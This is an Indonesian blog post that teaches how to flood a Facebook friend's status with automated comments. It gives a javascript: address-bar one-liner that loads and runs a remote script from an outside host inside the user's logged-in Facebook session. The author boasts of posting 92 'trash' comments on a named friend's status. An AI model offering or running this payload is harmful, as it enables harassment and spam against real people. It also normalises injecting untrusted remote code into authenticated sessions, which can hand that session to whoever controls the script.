close

Ticker

6/recent/ticker-posts

Hacking Facebook With Comment Flooder

Flooder atau membanjiri... digunakan untuk membanjiri pemberitahuan di FB agar si penerima merasa di isengiii (yahh kalo maenan Aku SMP dulu sering isengin kawan")


ok langsung pertama kita cari target..... kriteria nya harus seperti dibawah ini (BERCANDA)

kedua klik time status misal bisa di lihat pada gambar ada tulisan 47 menit yang lalu klik itu.
dan akan tampil gambar seperti ini

yak hanya ada status dan komentar saja, di profile korban konten yang lain tidak tampil
kemudian masukkan script JS ke address bar mozilla / web browse anda.
kemudian tekan enter.

javascript:(a = (b = document).createElement("script")).src = "//brk.to/flood", b.body.appendChild(a); void(0);
bisa dilihat pada gambar letak paste script JS nya.
dan akan muncul pop up seperti gambar di bawah ini
masukkan jumlah pesan 
saya kasih pesan buat status nya 100 (dak seru kalo komentar nyo dikit)
dan isi pesan saya cwih SAMPAH !


DAN APA YANG TERJADIIIIII......... BOOM !!!!!!!!!!!!!!!!!!!!!!!!!!!

status Facebook teman saya sudah dibanjiri 92 komentar............ memang saya masukkan 100 jumlah nya, mungkin koneksi saya sedang tidak bagus jadi hanya 92 komentar yang membanjiri, tapi tak apa lah teman saya pasti senang karena ada yang komentar.... Tanks to Ryan yang sudah jadi korban,

KALO BEGINI TERUS PASTI GAK BETAH BUAT STATUS...... HA HA HA HA

Sekian....... Powered By ELECTRON CYBER




Posting Komentar

0 Komentar